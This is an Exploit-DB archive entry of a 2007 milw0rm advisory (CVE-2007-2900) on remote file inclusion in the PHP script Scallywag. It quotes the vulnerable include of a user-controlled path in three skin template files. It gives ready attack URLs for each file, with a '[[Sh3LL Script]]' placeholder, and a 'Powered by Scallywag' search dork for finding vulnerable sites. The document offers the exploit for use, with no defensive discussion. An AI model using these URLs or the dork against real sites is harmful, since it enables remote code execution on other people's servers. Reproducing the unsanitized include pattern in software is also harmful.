Author: Mehmet Ince type: webapps platform: php port: nan date_added: 2007-05-22 date_updated: 2016-10-05 verified: 1 codes: OSVDB-38144;CVE-2007-2900;OSVDB-38143;OSVDB-38142 tags: aliases: screenshot_url: application_url: http://www.exploit-db.com3791_3791.rar
##############################################################################################
#Scallywag <= Remote File Inclusion Vulnerability #
# #
#Dork:"Powered by Scallywag" #
# #
# #
##############################################################################################
#Vuln Code #
# #
#ERROR1:skin/dark/template.php #
# #
# <?php #
# include("$path/source/top.txt"); <<< RFI CODE #
# #
# #
#BUG1: #
# #
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]] #
##############################################################################################
# #
#ERROR2:skin/gold/template.php #
# #
# <?php #
# include("$path/source/top.txt"); <<< RFI CODE #
# #
# #
#BUG2: #
# #
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]] #
##############################################################################################
# #
#ERROR3:skin/original/template.php #
# #
# <?php #
# include("$path/source/top.txt"); <<< RFI CODE #
# #
# #
#BUG3: #
# #
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]] #
##############################################################################################
# #
#Script Download #
##############################################################################################
# #
#http://www.woweb.ru/load/82-1-0-3791 #
# #
##############################################################################################
# #
#Cyber-Security #
# #
##############################################################################################
##############################################################################################
# milw0rm.com [2007-05-23]